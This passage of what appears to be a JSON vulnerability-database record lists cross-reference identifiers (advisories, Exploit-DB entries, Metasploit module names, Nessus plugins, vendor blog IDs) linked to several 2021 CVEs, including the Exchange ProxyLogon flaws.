"CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4846-1:82C83", "DEBIAN:DSA-4846-1:CCE83", "DEBIAN:DSA-4858-1:7131E", "DEBIAN:DSA-4886-1:0EF07", "DEBIAN:DSA-4886-1:8DF2D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21139", "DEBIANCVE:CVE-2021-21148", "DEBIANCVE:CVE-2021-21166"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163", "EDB-ID:49602", "EDB-ID:49879", "EDB-ID:49895", "EDB-ID:50056"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fedora", "idList": ["FEDORA:4E16930B130B", "FEDORA:87F5C30A253B", "FEDORA:A017F3074280", "FEDORA:BB03930B3A56", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D", "FEDORA:E0A463072F31"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "freebsd", "idList": ["3E01AAD2-680E-11EB-83E2-E09467587C17", "4ED0E43C-5CEF-11EB-BAFD-3065EC8FD3EC", "F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202101-13", "GLSA-202104-08"]}, {"type": "githubexploit", "idList": ["02C6FE13-5036-5BE5-8AC8-278A918BA581", "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "13364575-934B-5E73-AA03-AEB6910F6AD2", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "14573955-860C-5947-8F2F-86347A606742", "18D647E9-D7D4-5591-B16C-05D007AFD726", "1C45657B-E388-5668-9093-F3934858B728", "1D0AAF42-5E68-5985-A800-90937D55628D", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "256984DC-A742-53F8-889F-2071EC134734", "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "28FA41D3-AED7-544E-97D0-EC0AA2218D6B", "3019C843-FE2F-527C-B7C1-14A1C3066721", "35B21CE7-1E51-5824-B70E-36480A6E8763", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "39EADA2B-CE50-555B-910E-D3B77640C464", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "449EACCC-CABA-5780-89D5-B637F4A49A6A", "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "4987606C-EB9B-581F-913D-36468DE9160E", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "5CAF0F94-804F-5B0F-A12F-AE830CD8027B", "5E516DC2-BF71-57D0-9A87-3874146D0F83", "626E6774-0ACC-594C-BB61-E89F8F034B11", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "64EF6553-4D22-526B-A1CC-09212DBD7625", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "7395180E-85B1-5253-9975-F93BE4693139", "7758268F-2004-536A-B51F-62DA1E5A992D", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "91A5BC48-2410-555B-B7FB-8138577D6B78", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "97B4F1B6-8D2A-54CF-B2DF-9B00FD2281DD", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9E82678F-0559-56B2-94DC-6505FE64555C", "A3CF9029-7017-54E6-A5D2-340157519576", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D4220876-A611-59AE-8262-07797542DAB9", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "ED6C0D8A-7C93-566E-BF39-4054211DABD6", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F5339382-9321-5B96-934D-B803353CC9E3", "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "ibm", "idList": ["425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B"]}, {"type": "kaspersky", "idList": ["KLA10661", "KLA11139", "KLA11170", "KLA12044", "KLA12048", "KLA12049", "KLA12062", "KLA12063", "KLA12071", "KLA12072", "KLA12075", "KLA12103", "KLA12106", "KLA12107", "KLA12108", "KLA12112", "KLA12178", "KLA12179"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "mageia", "idList": ["MGASA-2021-0142", "MGASA-2021-0406"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:232C556149FB9AC828C416ADCCF93766", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:AC714CB24C401F36B220E29C6D2B049F", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-"]}, {"type": "mmpc", "idList": ["MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0802", "MS:CVE-2021-1647", "MS:CVE-2021-1698", "MS:CVE-2021-1732", "MS:CVE-2021-21139", "MS:CVE-2021-21148", "MS:CVE-2021-21166", "MS:CVE-2021-24074", "MS:CVE-2021-24086", "MS:CVE-2021-24092", "MS:CVE-2021-24094", "MS:CVE-2021-26411", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078"]}, {"type": "mskb", "idList": ["KB2553204", "KB3089664", "KB3162047", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659", "KB5000800", "KB5000803", "KB5000809", "KB5000822", "KB5000844", "KB5000848", "KB5000871", "KB5000978"]}, {"type": "msrc", "idList": ["MSRC:E730BB5421ADC3C2D8E7B5B1C5CD88FB", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["701323.PASL", "ADOBE_ACROBAT_APSB21-09.NASL", "ADOBE_READER_APSB21-09.NASL", "DEBIAN_DSA-4846.NASL", "DEBIAN_DSA-4858.NASL", "DEBIAN_DSA-4886.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2021-05AFA65D39.NASL", "FEDORA_2021-4740239E28.NASL", "FEDORA_2021-48866282E5.NASL", "FEDORA_2021-7FB30B9381.NASL", "FEDORA_2021-B7CC24375B.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_3E01AAD2680E11EB83E2E09467587C17.NASL", "FREEBSD_PKG_4ED0E43C5CEF11EBBAFD3065EC8FD3EC.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202101-13.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_88_0_4324_150.NASL", "GOOGLE_CHROME_88_0_4324_96.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "HAFNIUM_IOC_DETECT.NBIN", "MACOSX_GOOGLE_CHROME_88_0_4324_150.NASL", "MACOSX_GOOGLE_CHROME_88_0_4324_96.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MACOSX_MS15-099_OFFICE_2011.NASL", "MACOS_ADOBE_ACROBAT_APSB21-09.NASL", "MACOS_ADOBE_READER_APSB21-09.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_50.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_63.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "OPENSUSE-2021-166.NASL", "OPENSUSE-2021-173.NASL", "OPENSUSE-2021-267.NASL", "OPENSUSE-2021-296.NASL", "OPENSUSE-2021-392.NASL", "OPENSUSE-2021-413.NASL", "SERVU_15_2_2_1.NASL", "SMB_NT_MS15-099.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601318.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601331.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_FEB_4601348.NASL", "SMB_NT_MS21_FEB_4601354.NASL", "SMB_NT_MS21_FEB_4601360.NASL", "SMB_NT_MS21_FEB_4601384.NASL", "SMB_NT_MS21_FEB_FEP.NASL", "SMB_NT_MS21_FEB_WIN_DEFENDER.NASL", "SMB_NT_MS21_JAN_FEP.NASL", "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "SMB_NT_MS21_MAR_5000803.NASL", "SMB_NT_MS21_MAR_5000807.NASL", "SMB_NT_MS21_MAR_5000808.NASL", "SMB_NT_MS21_MAR_5000809.NASL", "SMB_NT_MS21_MAR_5000822.NASL", "SMB_NT_MS21_MAR_5000841.NASL", "SMB_NT_MS21_MAR_5000844.NASL", "SMB_NT_MS21_MAR_5000847.NASL", "SMB_NT_MS21_MAR_5000848.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SMB_NT_MS21_MAR_INTERNET_EXPLORER.NASL", "SMB_NT_MS21_MAY_INTERNET_EXPLORER.NASL", "SOLARWINDS_ORION_2019_4_2.NASL", "SOLARWINDS_ORION_2020_2_4.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "WEB_APPLICATION_SCANNING_113243"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806110", "OPENVAS:1361412562310806111", "OPENVAS:1361412562310806114", "OPENVAS:1361412562310806115", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "osv", "idList": ["OSV:DSA-4846-1", "OSV:DSA-4858-1", "OSV:DSA-4886-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161880", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163268", "PACKETSTORM:166169"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:9D9AFD21093A2BAEA68BD964595F69A3", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:2232AFF7B86AF6E40FEC6191FAD74DCC", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A10F281EF99381636376D6F6C6501E22", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A3D3514100806269750A23D748D34C59", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A823F31C04C74DD103337324E6D218C9", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14690"]}, {"type": "seebug", "idList": ["SSV:89457", "SSV:99168", "SSV:99189", "SSV:99260"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0166-1", "OPENSUSE-SU-2021:0173-1", "OPENSUSE-SU-2021:0177-1", "OPENSUSE-SU-2021:0186-1", "OPENSUSE-SU-2021:0267-1", "OPENSUSE-SU-2021:0276-1", "OPENSUSE-SU-2021:0296-1", "OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1", "OPENSUSE-SU-2021:0413-1", "OPENSUSE-SU-2021:0973-1", "OPENSUSE-SU-2021:1016-1"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347", "SMNTC-76564"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "TALOSBLOG:D6DE736915C69A194D894AE9BED7EC57", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:012EBB2FE2687F178FBCC3AB8ABEF778", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:125A440CBDB25270B696C1CCC246BEA1", "THN:15BF409706D7240A5276C705732D745F", "THN:1628F014C29F23FB8C8FF7EBC7ADC137", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:2E0F12E8B4294632DF7D326E9360976B", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:4225CEE6D7775276254C20B6E19126AE", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:6A9CD6F085628D08978727C0FF597535", "THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:970890B8E519A3BC5427798160F5F09C", "THN:97FD375C23B4E7C3F13B9F3907873671", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9CF96D7230D0DBA395C1DEDA718226AD", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:A16295D1572D6F721B7A8CC6EB7690FA", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B7217784F9D53002315C9C43CCC73766", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:DADA9CB340C28F942D085928B22B103F", "THN:DE791A2DD37FD88B59147561CF1F7BBF", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:F2A3695D04A2484E069AC407E754A9C1", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FA6A50184463DFCD20073D5EDD0F36F2", "THN:FBCEC8F0CE0D3932FE4C315878C48403", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", 